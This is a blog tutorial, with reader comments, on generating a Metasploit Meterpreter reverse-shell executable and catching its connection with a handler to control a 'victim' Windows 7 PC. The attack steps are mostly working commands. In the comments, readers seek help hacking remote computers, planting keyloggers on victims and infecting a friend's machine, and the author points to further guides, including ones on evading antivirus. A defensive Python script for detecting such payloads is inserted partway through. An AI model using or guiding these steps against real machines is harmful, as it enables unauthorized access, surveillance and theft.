Create Simple Exploit Using Metasploit to Hack Windows 7



Type : Tutorial

Level : Easy

As I already wrote in my previous post about how to add a user with administrator rights (you can read the tips and trick here), today I will write a simple tutorial on creating an exploit for Windows 7 and all Windows versions.

Everyone loves the simple way, don't they? That's why in my previous tutorial and in today's tutorial I have kept everything simple and easy to use :)

In today's tutorial we will learn how to create a simple exploit (easy to create and easy to implement :) ) and how to connect to a Windows 7 victim that has already executed our simple exploit… simple, isn't it?

Okay let’s start the tutorial.

Requirements :

1. Metasploit Framework

2. Windows XP and earlier Windows version (I use Windows 7 SP1)

Step by Step :

FYI: in this tutorial I use Backtrack 5 R2 with Metasploit Framework 4.2.0, and my IP address is

1. Open your terminal console and type the following command :

msfpayload windows/meterpreter/reverse_tcp LHOST= X > Desktop/v4L.exe


The above command will create a Windows executable file named "v4L.exe" and save it on your desktop.

2. Now you need to copy your newly created v4L.exe to your Windows 7 system. If you don't know how to share your Backtrack 5 folder, you can view the tutorial on how to share a folder in Backtrack (view tutorial here).

3. Next, we need to create a handler for the connection that comes back to our Backtrack system from the simple exploit we created earlier. Open your Metasploit console and type the following commands :

Information :

use exploit/multi/handler --> use the metasploit handler

set payload windows/meterpreter/reverse_tcp --> we use reverse_tcp (see step 1)

set lhost --> set our local IP address that will catch the reverse connection

exploit -j -z --> start the handler

4. Now execute the simple exploit we copied to Windows 7 and see whether our handler receives anything. Below is the screenshot of my handler when Windows 7 executed the simple exploit :

I use sessions -l to list every session that is already open.

5. To interact with an available session, you can use sessions -i <session_id>. From there you can run other commands as you want.

Yes, we're inside Windows 7 now :)

Countermeasures :

1. Install a 3rd party firewall and antivirus and keep them always updated.
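A detection-side illustration of the countermeasure above, added here and not part of the original post: it flags an executable that was recently written to a user-writable folder and then opens an outbound connection, which is the behaviour the tutorial's v4L.exe shows on the Windows 7 machine. The event records, field names, addresses and the 24-hour window are constructed assumptions, loosely modelled on Sysmon file-creation (ID 11) and network-connection (ID 3) events.

```python
from datetime import datetime, timedelta

# Paths an unprivileged user can normally write to (assumed list, extend as needed).
USER_WRITABLE = ("\\users\\", "\\windows\\temp\\", "\\programdata\\")
WINDOW = timedelta(hours=24)  # assumed "recently dropped" window

# Constructed sample events; field names are hypothetical simplifications.
EVENTS = [
    {"id": 11, "time": "2012-04-01T09:00:00", "path": r"C:\Users\alice\tools\sync.exe"},
    {"id": 11, "time": "2012-05-01T10:00:05", "path": r"C:\Users\alice\Desktop\v4L.exe"},
    {"id": 11, "time": "2012-05-01T10:00:30", "path": r"C:\Program Files\App\updater.exe"},
    {"id": 3, "time": "2012-05-01T10:01:11", "image": r"C:\Users\alice\Desktop\v4L.exe",
     "initiated": True, "dst_ip": "192.0.2.10", "dst_port": 4444},
    {"id": 3, "time": "2012-05-01T10:02:00", "image": r"C:\Program Files\App\updater.exe",
     "initiated": True, "dst_ip": "198.51.100.7", "dst_port": 443},
    {"id": 3, "time": "2012-05-01T10:03:00", "image": r"C:\Users\alice\tools\sync.exe",
     "initiated": True, "dst_ip": "198.51.100.8", "dst_port": 443},
]

def ts(value):
    return datetime.fromisoformat(value)

def find_suspects(events, window=WINDOW):
    """Return (image, dst_ip, dst_port) for outbound connections made by an
    executable written to a user-writable path within `window` beforehand."""
    dropped = {}  # lower-cased path -> time the file was written
    alerts = []
    for ev in sorted(events, key=lambda e: ts(e["time"])):
        if ev["id"] == 11 and ev["path"].lower().endswith(".exe"):
            dropped[ev["path"].lower()] = ts(ev["time"])
        elif ev["id"] == 3 and ev["initiated"]:
            image = ev["image"].lower()
            written = dropped.get(image)
            # The destination port is ignored on purpose: the remote side picks it.
            if (written is not None
                    and any(d in image for d in USER_WRITABLE)
                    and ts(ev["time"]) - written <= window):
                alerts.append((ev["image"], ev["dst_ip"], ev["dst_port"]))
    return alerts

if __name__ == "__main__":
    for image, ip, port in find_suspects(EVENTS):
        print(f"ALERT: {image} connected out to {ip}:{port}")
```

Freshly downloaded installers and updaters will also match this rule, so in practice it needs an allowlist of signed or known-good images.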

Hope it's useful :)

FYI: There is another tutorial about Hacking Remote Desktop that I will post later.


  • hair

    Hi man… nice post! Please help me with how to make it remotely? Is it possible on Win XP?
    Please send to my email about Hacking Remote Desktop… thanks a lot, I need to learn to work in security testing

    • v4L

      yes it’s also possible on win XP

  • BlackTrminatr

    Nice post.. but can you tell me how to do this remotely… I have configured my router for port forwarding but don’t know what to do next..


    • v4L

      You need to understand how exploit and payload work. maybe you can give a try to see the simple explanation in this tutorial http://www./hacking-tutorial/hacking-into-xp-sp3-via-microsoft-office-excel-ms11_021_xlb_bof-vulnerability/ about lport, lhost; and I think this tutorial clear enough for the basic http://www./hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/

  • nathan

    hey man, awesome blog!
    Quick question, wondering whether its possible to add a .exe keylogger after the exploit has occured and place it on the victims computer and somehow click it so it activates

    • v4L

      you can view here http://www./hacking-tutorial/create-exploit-using-msfvenom-to-hack-windows-7-sp1/

  • Prakash Tomar

    Hey man i just creatd an account in web hosting site..nd der i redirect my own website url to nw wat i have to do i’m nt getting to hack wan computer..i knw i have to create a payload and listener bt wat bout server..plz help me..

    • v4L

      if you host, then you’ll hack using web app; if you want to hack a victim PC’s, then you need to buy your own dedicated backtrack server or you can view the tutorial here http://www./hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/

      • Prakash

        Gimme steps using web app..i got stuck..

  • r12

    I am using dongle with dynamic IP. I am using host name from to redirect my dynamic IP address. so I typed this to create .exe file:
    “””msfpayload windows/meterpreter/reverse_tcp X > Desktop/v4l.exe”””

    and then I set up the handler and payload and set the lhost:
    “””set lhost”””

    but when I execute exploit command there’s an error:
    “””Handler failed to bind to″””

    ps: is my current dynamic global IP address

    what should I do? help me plz….

  • r12

    I am able to use msf on virtual LAN. thanks for your tutorials. but I want to do it over internet, FYI I don’t have router, I only have a computer and a dongle. Do you have any idea on error message I have shown you above? oh ya inspite of error, I try to execute the .exe on my friends computer. but there is no session appear on server machine.
    any help would be really appreciated. THANKS

  • gabeapp

    lets say i will be able to get the file on the victims computer how can i use this if the target is on an external location?

    • v4L


  • Hi my friend, I'd like to thank you for this post, and I also appreciate your easy way of explaining things. However, what's the usefulness of this tutorial since it can NEVER bypass any security measures, and why do you specify this attack to Windows 7?? This exe meterpreter can be used on any Microsoft system, ONLY if firewalls & antiviruses are disabled :(

    • v4L

      you didn’t feel the usefulness because you want the fast and easy way :)
      with all of this you also can build a new one without caught by antivirus, but of course for all of it you need an effort to learn more after you know the basic.

  • Ahmed El-Nagdy

    Thanks 4 ur efforts:
    But …
    I am trying to run this “exploit” to hack xp-sp3
    The result is:
    msf exploit(ms08_067_netapi) > exploit -j -z
    [*] Exploit running as background job.

    [-] Handler failed to bind to
    [-] Handler failed to bind to
    [-] Exploit failed: Rex::AddressInUse The address is already in use (

    I am waiting ur answer
    Please Accept My Best Regards.

    • v4L


      Maybe your previous exploit hasn’t been killed yet. Try restarting your msfconsole.

  • Stanko


    I have two computers: one, my Mac, which is running BT5r3 on VMware Fusion, and a Windows 7 laptop. They are both connected to the same WLAN, same router, everything. Which tutorial do I follow to exploit the Windows 7 laptop? Because even though I disable my firewall/AV I’m still having problems on armitage/fast-track, etc :/

    • v4L


      You can start learning from here http://www./tips-and-trick/install-metasploitable-on-virtual-box/. And you can try using your armitage. We can’t only run armitage and hope to find a red vulnerable PC when scanning, because nowadays the vulnerabilities come from 3rd party applications. Maybe updating your armitage + metasploit framework is a good idea to start.

  • hacker

    Easy to hack a Window system when you have your hands directly on the machine, not very hard to do! Boot a LIVE version of any linux and you will have the power to DESTROY any local Windows machine, simple as that!

  • phoenix6142

    Great tutorial, thank you. I have success!

  • jp

    it says that I cant open the aplication